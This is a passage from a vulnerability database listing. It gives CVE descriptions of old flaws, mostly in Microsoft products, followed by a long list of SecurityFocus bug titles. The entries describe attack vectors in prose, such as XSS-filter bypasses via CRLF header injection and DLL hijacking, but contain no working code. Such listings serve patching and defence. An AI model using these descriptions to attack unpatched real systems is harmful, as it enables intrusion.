vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3497] Symantec Norton AntiVirus 2011 does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that this issue "falls into the work of our Firewall and not our AV (per our methodology of layers of defense)." [CVE-2010-3454] Multiple off-by-one errors in the WW8DopTypography::ReadFromMem function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted typography information in a Microsoft Word .DOC file that triggers an out-of-bounds write. [CVE-2010-3453] The WW8ListManager::WW8ListManager function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 does not properly handle an unspecified number of list levels in user-defined list styles in WW8 data in a Microsoft Word document, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .DOC file that triggers an out-of-bounds write. [CVE-2010-3141] Untrusted search path vulnerability in Microsoft PowerPoint 2010 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse pptimpconv.dll that is located in the same folder as a .odp, .pot, .potm, .potx, .ppa, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .pwz, .sldm, or .sldx file. [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2734] Cross-site scripting (XSS) vulnerability in the mobile portal in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability." [CVE-2010-2733] Cross-site scripting (XSS) vulnerability in the Web Monitor in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "UAG XSS Allows EOP Vulnerability." [CVE-2010-2732] Open redirect vulnerability in the web interface in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka "UAG Redirection Spoofing Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-1184] The Microsoft wireless keyboard uses XOR encryption with a key derived from the MAC address, which makes it easier for remote attackers to obtain keystroke information and inject arbitrary commands via a nearby wireless device, as demonstrated by Keykeriki 2. [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-0806] Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0716] _layouts/Upload.aspx in the Documents module in Microsoft SharePoint before 2010 uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading TXT files, a related issue to CVE-2008-5026. NOTE: the vendor disputes the significance of this issue, because cross-domain isolation can be implemented when needed. [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5556] DISPUTED The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not recognize attack patterns designed to operate against web pages that are encoded with utf-7, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting crafted utf-7 content. NOTE: the vendor reportedly disputes this issue, stating "Behaviour is by design." [CVE-2008-5555] Microsoft Internet Explorer 8.0 Beta 2 relies on the XDomainRequestAllowed HTTP header to authorize data exchange between domains, which allows remote attackers to bypass the product's XSS Filter protection mechanism, and conduct XSS and cross-domain attacks, by injecting this header after a CRLF sequence, related to "XDomainRequest Allowed Injection (XAI)." NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5554] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not properly handle some HTTP headers that appear after a CRLF sequence in a URI, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS or redirection attacks, as demonstrated by the (1) Location and (2) Set-Cookie HTTP headers. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5553] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 disables itself upon encountering a certain X-XSS-Protection HTTP header, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting this header after a CRLF sequence. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5552] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks via a CRLF sequence in conjunction with a crafted Content-Type header, as demonstrated by a header with a utf-7 charset value. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5551] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting data at two different positions within an HTML document, related to STYLE elements and the CSS expression property, aka a "double injection." [CVE-2008-5180] Microsoft Communicator, and Communicator in Microsoft Office 2010 beta, allows remote attackers to cause a denial of service (memory consumption) via a large number of SIP INVITE requests, which trigger the creation of many sessions. [CVE-2008-4211] Integer signedness error in (1) QuickLook in Apple Mac OS X 10.5.5 and (2) Office Viewer in Apple iPhone OS 1.0 through 2.1 and iPhone OS for iPod touch 1.1 through 2.1 allows remote attackers to cause a denial of service (application termination) and execute arbitrary code via a crafted Microsoft Excel file that triggers an out-of-bounds memory access, related to "handling of columns." [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-0341] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.1 and earlier, when Microsoft Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a CSS style in the convcharset parameter to the top-level URI, a different vulnerability than CVE-2005-0992. [CVE-2006-5559] The Execute method in the ADODB.Connection 2.7 and 2.8 ActiveX control objects (ADODB.Connection.2.7 and ADODB.Connection.2.8) in the Microsoft Data Access Components (MDAC) 2.5 SP3, 2.7 SP1, 2.8, and 2.8 SP1 does not properly track freed memory when the second argument is a BSTR, which allows remote attackers to cause a denial of service (Internet Explorer crash) and possibly execute arbitrary code via certain strings in the second and third arguments. [CVE-2006-4686] Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. [CVE-2006-4685] The XMLHTTP ActiveX control in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 does not properly handle HTTP server-side redirects, which allows remote user-assisted attackers to access content from other domains. [CVE-2006-1359] Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer. [CVE-2006-0761] Buffer overflow in BlackBerry Attachment Service in Research in Motion (RIM) BlackBerry Enterprise Server 2.2 and 4.0 before SP3 Hotfix 4 for IBM Lotus Domino, 3.6 before SP7 and 5.0 before SP3 Hotfix 3 for Microsoft Exchangem, and 4.0 for Novell GroupWise before SP3 Hotfix 1 might allow user-assisted remote attackers to execute arbitrary code on the server via a crafted Microsoft Word document that is opened on a wireless device. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0544] urlmon.dll in Microsoft Internet Explorer 7.0 beta 2 (aka 7.0.5296.0) allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a BGSOUND element with its SRC attribute set to "file://" followed by a large number of "-" (dash of hyphen) characters. [CVE-2006-0003] Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2005-1929] Multiple heap-based buffer overflows in (1) isaNVWRequest.dll and (2) relay.dll in Trend Micro ServerProtect Management Console 5.58 and earlier, as used in Control Manager 2.5 and 3.0 and Damage Cleanup Server 1.1, allow remote attackers to execute arbitrary code via "wrapped" length values in Chunked transfer requests. NOTE: the original report suggests that the relay.dll issue is related to a problem in which a Microsoft Foundation Classes (MFC) static library returns invalid values under heavy load. As such, this might not be a vulnerability in Trend Micro's product. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2004-1322] Cisco Unity 2.x, 3.x, and 4.x, when integrated with Microsoft Exchange, has several hard coded usernames and passwords, which allows remote attackers to gain unauthorized access and change configuration settings or read outgoing or incoming e-mail messages. [CVE-2003-1306] Microsoft URLScan 2.5, with the RemoveServerHeader option enabled, allows remote attackers to obtain sensitive information (server name and version) via an HTTP request that generates certain errors such as 400 "Bad Request," which leak the Server header in the response. [CVE-2003-0903] Buffer overflow in a component of Microsoft Data Access Components (MDAC) 2.5 through 2.8 allows remote attackers to execute arbitrary code via a malformed UDP response to a broadcast request. [CVE-2003-0353] Buffer overflow in a component of SQL-DMO for Microsoft Data Access Components (MDAC) 2.5 through 2.7 allows remote attackers to execute arbitrary code via a long response to a broadcast request to UDP port 1434. [CVE-2002-1918] Buffer overflow in Microsoft Active Data Objects (ADO) in Microsoft MDAC 2.5 through 2.7 allows remote attackers to have unknown impact with unknown attack vectors. NOTE: due to the lack of details available regarding this issue, perhaps it should be REJECTED. [CVE-2002-1142] Heap-based buffer overflow in the Remote Data Services (RDS) component of Microsoft Data Access Components (MDAC) 2.1 through 2.6, and Internet Explorer 5.01 through 6.0, allows remote attackers to execute code via a malformed HTTP request to the Data Stub. [CVE-2002-1015] RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary script in the Local computer zone by inserting the script into the skin.ini file of an RJS archive, then referencing skin.ini from a web page after it has been extracted, which is parsed as HTML by Internet Explorer or other Microsoft-based web readers. [CVE-2002-0697] Microsoft Metadirectory Services (MMS) 2.2 allows remote attackers to bypass authentication and modify sensitive data by using an LDAP client to directly connect to MMS and bypass the checks for MMS credentials. [CVE-2002-0057] XMLHTTP control in Microsoft XML Core Services 2.6 and later does not properly handle IE Security Zone settings, which allows remote attackers to read arbitrary files by specifying a local file as an XML Data Source. [CVE-2001-1218] Microsoft Internet Explorer for Unix 5.0SP1 allows local users to possibly cause a denial of service (crash) in CDE or the X server on Solaris 2.6 by rapidly scrolling Chinese characters or maximizing the window. [CVE-2000-0563] The URLConnection function in MacOS Runtime Java (MRJ) 2.1 and earlier and the Microsoft virtual machine (VM) for MacOS allows a malicious web site operator to connect to arbitrary hosts using a HTTP redirection, in violation of the Java security model. [CVE-1999-1097] Microsoft NetMeeting 2.1 allows one client to read the contents of another client's clipboard via a CTRL-C in the chat box when the box is empty. SecurityFocus - https://www.securityfocus.com/bid/: [83154] Microsoft Windows 2000 Server CVE-2004-0540 Remote Security Vulnerability [45297] Microsoft Exchange Server 2007 Infinite Loop Remote Denial of Service Vulnerability [43419] Microsoft Excel 2002 Memory Corruption Vulnerability [43189] Microsoft Visual C++ 2008 Redistributable Package DLL Loading Arbitrary Code Execution Vulnerability [42742] Microsoft PowerPoint 2007 Multiple DLL Loading Arbitrary Code Execution Vulnerability [42695] Microsoft Groove 2007 'mso.dll' DLL Loading Arbitrary Code Execution Vulnerability [42681] Microsoft Visio 2003 'mfc71enu.dll' DLL Loading Arbitrary Code Execution Vulnerability [41843] Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability [39776] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [37196] RETIRED: Microsoft December 2009 Advance Notification Multiple Vulnerabilities [36940] RETIRED: Microsoft November 2009 Advance Notification Multiple Vulnerabilities [36633] RETIRED: Microsoft October 2009 Advance Notification Multiple Vulnerabilities [36239] RETIRED: Microsoft September 2009 Advance Notification Multiple Vulnerabilities [35974] RETIRED: Microsoft August 2009 Advance Notification Multiple Vulnerabilities [35617] RETIRED: Microsoft July 2009 Advance Notification Multiple Vulnerabilities [35213] RETIRED: Microsoft June 2009 Advance Notification Multiple Vulnerabilities [34867] RETIRED: Microsoft May 2009 Advance Notification Multiple Vulnerabilities [34532] Microsoft IAG 2007 ActiveX Control Multiple Stack Based Buffer Overflow Vulnerabilities [34469] Microsoft Word 2000 WordPerfect Converter Remote Code Execution Vulnerability [34450] RETIRED: Microsoft April 2009 Advance Notification Multiple Vulnerabilities [34005] RETIRED: Microsoft March 2009 Advance Notification Multiple Vulnerabilities [33639] RETIRED: Microsoft February 2009 Advance Notification Multiple Vulnerabilities [33170] RETIRED: Microsoft January 2009 Advance Notification Multiple Vulnerabilities [32632] RETIRED: Microsoft December 2008 Advance Notification Multiple Vulnerabilities [32153] Retired: Microsoft November 2008 Advance Notification Multiple Vulnerabilities [31667] Retired: Microsoft October 2008 Advance Notification Multiple Vulnerabilities [31129] RETIRED: Microsoft SQL Server 2000 'sqlvdir.dll' ActiveX Buffer Overflow Vulnerability [31014] RETIRED: Microsoft September 2008 Advance Notification Multiple Vulnerabilities [30593] RETIRED: Microsoft August 2008 Advance Notification Multiple Vulnerabilities [30075] RETIRED: Microsoft July 2008 Advance Notification Multiple Vulnerabilities [29576] RETIRED: Microsoft June 2008 Advance Notification Multiple Vulnerabilities [29108] RETIRED: Microsoft May 2008 Advance Notification Multiple Vulnerabilities [28598] RETIRED: Microsoft April 2008 Advance Notification Multiple Vulnerabilities [28124] Retired: Microsoft March 2008 Advance Notification Multiple Vulnerabilities [27674] RETIRED: Microsoft February 2008 Advance Notification Multiple Vulnerabilities [27119] RETIRED: Microsoft January 2008 Advance Notification Multiple Vulnerabilities [26739] RETIRED: Microsoft December 2007 Advance Notification Multiple Vulnerabilities [26414] Microsoft Forms 2.0 ActiveX Control Memory Access Violation Denial of Service Vulnerabilities [26380] Retired: Microsoft November 2007 Advance Notification Multiple Vulnerabilities [25991] RETIRED: Microsoft Office 2000 and XP Unspecified Word Document Handling DoS Vulnerability [25922] RETIRED: Microsoft October 2007 Advance Notification Multiple Vulnerabilities [25573] RETIRED: Microsoft September 2007 Advance Notification Multiple Vulnerabilities [25247] Retired: Microsoft August 2007 Advance Notification Multiple Vulnerabilities [24771] Retired: Microsoft July 2007 Advance Notification Multiple Vulnerabilities [24366] RETIRED: Microsoft June 2007 Advance Notification Multiple Vulnerabilities [24118] Microsoft Office 2000 UA OUACTRL.OCX ActiveX Control Buffer Overflow Vulnerability [23800] RETIRED: Microsoft May 2007 Advance Notification Multiple Vulnerabilities [23380] Microsoft Word 2007 WWLib.DLL Unspecified Document File Buffer Overflow Vulnerability [23335] RETIRED: Microsoft April 2007 Advance Notification Multiple Vulnerabilities [22716] Microsoft Office 2003 Denial of Service Vulnerability [22567] Microsoft Word 2000/2002 Document Stream Remote Code Execution Vulnerability [22328] RETIRED: Microsoft Word 2003 Unspecified Code Execution Vulnerability [22225] Microsoft Word 2000 Malformed Function Code Execution Vulnerability [21611] Microsoft Project Server 2003 PDSRequest.ASP XML Request Information Disclosure Vulnerability [21495] Microsoft Windows 2000 Remote Installation Service Remote Code Execution Vulnerability [20843] Microsoft Visual Studio 2005 WMI Object Broker Remote Code Execution Vulnerability [19636] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [19388] Microsoft Windows 2000 Kernel Local Privilege Escalation Vulnerability [17134] Microsoft Commerce Server 2002 Authentication Bypass Vulnerability [16634] Microsoft PowerPoint 2000 Remote Information Disclosure Vulnerability [14772] Microsoft Exchange Server 2003 Exchange Information Store Denial Of Service Vulnerability [14093] Microsoft Update Rollup 1 for Windows 2000 SP4 Released - Multiple Vulnerabilities Fixed [13564] Microsoft SQL Server 2000 Multiple Vulnerabilities [13008] Microsoft Windows Server 2003 SMB Redirector Local Denial Of Service Vulnerability [12972] Microsoft Windows Server 2003 Service Pack 1 Released - Multiple Vulnerabilities Fixed [12913] Microsoft Outlook 2002 Connector For IBM Lotus Domino Policy Bypass Vulnerability [12824] Microsoft InfoPath 2003 Insecure Information Storage Vulnerability [12641] Microsoft Windows 2000 Group Policy Bypass Vulnerability [12141] Microsoft FrontPage 2000 Internet Publishing Service Provider DAV File Upload Vulnerability [11820] Microsoft Windows 2000 Resource Kit W3Who.DLL Multiple Remote Vulnerabilities [11446] Microsoft Outlook 2003 Security Policy Bypass Vulnerability [11387] Microsoft Windows 2003 Services Default SACL Access Right Weakness [10901] Microsoft Windows 2000/XP CRL File Failed Integrity Check Denial Of Service Vulnerability [10693] Microsoft Windows 2000 Media Player Control Media Preview Script Execution Vulnerability [10484] Microsoft ISA Server 2000 FTP Bounce Filtering Vulnerability [10480] Microsoft ISA Server 2000 Site And Content Rule Bypass Vulnerability [10440] Microsoft Windows 2000 Domain Expired Account Security Policy Violation Weakness [10369] Microsoft Outlook 2003 Media File Script Execution Vulnerability [10307] Microsoft Outlook 2003 Predictable File Location Weakness [10114] Microsoft Windows 2000 Domain Controller LDAP Denial Of Service Vulnerability [9409] Microsoft Exchange Server 2003 Outlook Web Access Random Mailbox Access Vulnerability [9408] Microsoft ISA Server 2000 H.323 Filter Remote Buffer Overflow Vulnerability [9118] Microsoft Exchange Server 2003 Outlook Web Access Lowered Security Settings Weakness [8833] Microsoft Windows 2000 TroubleShooter ActiveX Control Buffer Overflow Vulnerability [8522] Multiple Microsoft Windows 2003 Stack Protection Implementation Weaknesses [8397] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [8104] Microsoft Windows 2000 Unauthorized RPC Connection Weakness [8098] Microsoft Windows 2000 Terminal Services Named Pipe System Account Access Vulnerability [8093] Microsoft Windows 2000 Active Directory Forest Origin Validation Vulnerability [8090] Microsoft Windows 2000 ShellExecute() Buffer Overflow Vulnerability [8089] Microsoft Windows 2000 Unspecified Cryptnet.DLL Memory Leakage Vulnerability [8086] Microsoft Windows 2000 Port Name Buffers Potential Buffer Overflow Vulnerability [8085] Microsoft Windows 2000 ModifyDN Request Denial of Service Vulnerability [8083] Microsoft Windows 2000 Domain Controller Spoofing Vulnerability [8081] Microsoft Windows 2000 USBH_IoctlGetNodeConnectionDriverKeyName Information Disclosure Vulnerability [8063] Microsoft Commerce Server 2002 Weak Registry Key Permissions Weakness [8045] Microsoft Windows 2000 SP4 Released - Multiple Vulnerabilities Fixed [7930] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [7788] Microsoft Windows 2000/XP/2003 IPV6 ICMP Flood Denial Of Service Vulnerability [7469] Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow Vulnerability [7360] Microsoft Windows 2000/XP Registry Editor Custom Permissions Weakness [7102] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [6769] Microsoft Windows 2000 RPC Service Privilege Escalation Vulnerability [6766] Microsoft Windows 2000 NetBIOS Continuation Packets Kernel Memory Leak Vulnerability [6667] Microsoft Outlook 2002 V1 Exchange Server Security Certificate Information Leakage Vulnerability [6319] Microsoft Outlook 2002 Email Header Processing Denial of Service Vulnerability [6030] Microsoft Windows 2000 SNMP Printer Query Denial of Service Vulnerability [5972] Microsoft Windows 2000/XP Full Event Log Administrative Alert Weakness [5922] Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability [5480] Microsoft Windows 2000 Network Connection Manager Privilege Elevation Vulnerability [5422] Microsoft Content Management Server 2001 SQL Injection Vulnerability [5421] Microsoft Content Management Server 2001 Arbitrary Upload Location Vulnerability [5420] Microsoft Content Management Server 2001 User Authentication Buffer Overflow Vulnerability [5415] Microsoft Windows 2000 Insecure Default File Permissions Vulnerability [5413] Microsoft Exchange 2000 Post Authorization License Exhaustion Denial Of Service Vulnerability [5412] Microsoft Exchange 2000 Multiple MSRPC Denial Of Service Vulnerabilities [5312] Microsoft SQL Server 2000 Resolution Service Denial of Service Vulnerability [5311] Microsoft SQL Server 2000 Resolution Service Stack Overflow Vulnerability [5310] Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability [5309] Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability [5307] Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability [5253] Microsoft Windows 2000 Narrator Password Disclosure Vulnerability [5205] Microsoft SQL Server 2000 Incorrect Registry Key Permissions Vulnerability [5111] Microsoft Commerce Server 2000 OWC Package Installer Local Command Execution Vulnerability [5014] Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability [4881] Microsoft Exchange 2000 Malformed Mail Attribute DoS Vulnerability [4853] Microsoft Commerce Server 2000 Profile Service Buffer Overflow Vulnerability [4852] Microsoft Windows 2000 Remote Access Service Buffer Overflow Vulnerability [4847] Microsoft SQL Server 2000 Bulk Insert Procedure Buffer Overflow Vulnerability [4797] Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Vulnerability [4683] Microsoft Windows 2000 / NT Path Precedence Vulnerability [4532] Microsoft Windows 2000 Lanman Denial of Service Vulnerability [4438] Microsoft Windows 2000 Group Policy Evasion Vulnerability [4426] Microsoft Windows 2000 / NT / XP MUP UNC Request Buffer Overflow Vulnerability [4287] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [4256] Microsoft Windows 2000 Password Policy Bypass Vulnerability [4157] Microsoft Commerce Server 2000 ISAPI Buffer Overflow Vulnerability [4095] Microsoft Windows 2000 Server Terminal Services Failure To Lock Terminal Vulnerability [3652] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability [3481] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [3479] Microsoft Windows 2000 NTFS With Macintosh Client Directory Permission Vulnerability [3445] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [3339] Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability [3305] Norton AntiVirus for Microsoft Exchange 2000 Information Disclosure Vulnerability [3291] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [3215] Microsoft Windows 2000 IrDA Buffer Overflow Denial of Service Vulnerability [3185] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [3184] Microsoft Windows 2000 RunAs User Credentials Exposure Vulnerability [3146] Microsoft Windows 2000 System File Replacement Vulnerability [3115] Microsoft Windows NT and 2000 Command Prompt Reboot Vulnerability [3063] Microsoft Windows 2000 Unauthorized Password Change Vulnerability [3033] Microsoft Windows 2000 Task Manager Process Termination Vulnerability [2988] Microsoft Windows 2000 SMTP Improper Authentication Vulnerability [2929] Microsoft Windows 2000 LDAP SSL Password Modification Vulnerability [2849] Microsoft Windows 2000 Telnet Privilege Escalation Vulnerability [2846] Microsoft Windows 2000 Telnet System Call DoS Vulnerability [2844] Microsoft Windows 2000 Telnet Service DoS Vulnerability [2843] Microsoft Windows 2000 Telnet Multiple Sessions DoS Vulnerability [2838] Microsoft Windows 2000 Telnet Username DoS Vulnerability [2460] Microsoft Windows 2000 Event Viewer Buffer Overflow Vulnerability [2441] Microsoft Exchange 2000 / IIS 5.0 Multiple Invalid URL Request DoS Vulnerability [2394] Microsoft Windows 2000 Domain Controller DoS Vulnerability [2341] Microsoft Windows 2000 Network DDE Escalated Privileges Vulnerability [2326] Microsoft Windows 2000 RDP DoS Vulnerability [2133] Microsoft Windows 2000 Directory Services Restore Mode Blank Password Vulnerability [2066] Microsoft Windows NT 4.0 / 2000 SNMP Registry Key Modification Vulnerability [2018] Microsoft Windows 2000 Telnet Session Timeout DoS Vulnerability [2007] Microsoft Windows 2000 DNS Memory Leak Vulnerability [1973] Microsoft Windows 2000 Domain Account Lockout Bypass Vulnerability [1958] Microsoft Exchange 2000 Server EUSR_EXSTOREEVENT Account Vulnerability [1933] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [1899] Microsoft Windows 2000 ActiveX Control Buffer Overflow Vulnerability [1811] Microsoft Site Server 2.0 with IIS 4.0 Malicious File Upload Vulnerability [1758] Microsoft Windows 2000 Unattended Install OEMPreinstall Vulnerability [1753] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [1748] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [1745] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [1729] Microsoft Windows 2000 Simplified Chinese IME Vulnerability [1695] Microsoft Proxy 2.0 FTP Permissions Bypass Vulnerability [1692] Microsoft Proxy 2.0 Internal Network Access Vulnerability [1683] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [1673] Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability [1651] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [1632] Microsoft Windows 98 / NT 4.0 / 2000 File Extension Validation Vulnerability [1620] Microsoft Windows 9x / NT 4.0 / 2000 NetBIOS Cache Corruption Vulnerability [1613] Microsoft Windows 2000 Local Security Policy Corruption Vulnerability [1566] Microsoft Word 97 / 2000 Mail Merge Code Execution Vulnerability [1561] Microsoft Word / Excel / Powerpoint 2000 Object Tag Buffer Overflow Vulnerability [1535] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [1507] Microsoft Windows NT 4.0 / 2000 Unspecified Executable Path Vulnerability [1451] Microsoft Excel 97 / 2000 Register.ID Vulnerability [1435] Microsoft FrontPage 2000 Server Extensions Denial Of Service Vulnerability [1415] Microsoft Windows 2000 Remote CPU-overload Vulnerability [1414] Microsoft Windows 2000 Telnet Server DoS Vulnerability [1399] Microsoft Internet Explorer 5.01 and Excel/Powerpoint 2000 ActiveX Object Execution Vulnerability [1398] Microsoft Internet Explorer 5.01 and Access 2000 / 97 VBA Code Execution Vulnerability [1350] Microsoft Windows 2000 Windows Station Access Vulnerability [1304] Microsoft Windows NT 4.0 / 2000 SMB Write Request DoS Vulnerability [1301] Microsoft Windows NT 4.0 / 2000 Ignored SMB Response DoS Vulnerability [1295] Microsoft Windows 2000 Default 40-bit Encrypted Protected Store Vulnerability [1198] Microsoft Windows 2000 Default SYSKEY Configuration Vulnerability [1197] Microsoft Office 2000 UA Control Vulnerability [990] Microsoft Windows 2000 Install Unprotected ADMIN$ Share Vulnerability [945] Microsoft SMS 2.0 Default Permissions Vulnerability [539] Microsoft Windows 2000 EFS Vulnerability [180] Microsoft Windows April Fools 2001 Vulnerability [71487] Microsoft December 2014 Advance Notification Multiple Vulnerabilities [70966] RETIRED: Microsoft November 2014 Advance Notification Multiple Vulnerabilities [70367] RETIRED: Microsoft October 2014 Advance Notification Multiple Vulnerabilities [69636] RETIRED: Microsoft September 2014 Advance Notification Multiple Vulnerabilities [69108] Microsoft August 2014 Advance Notification Multiple Vulnerabilities [68367] Microsoft July 2014 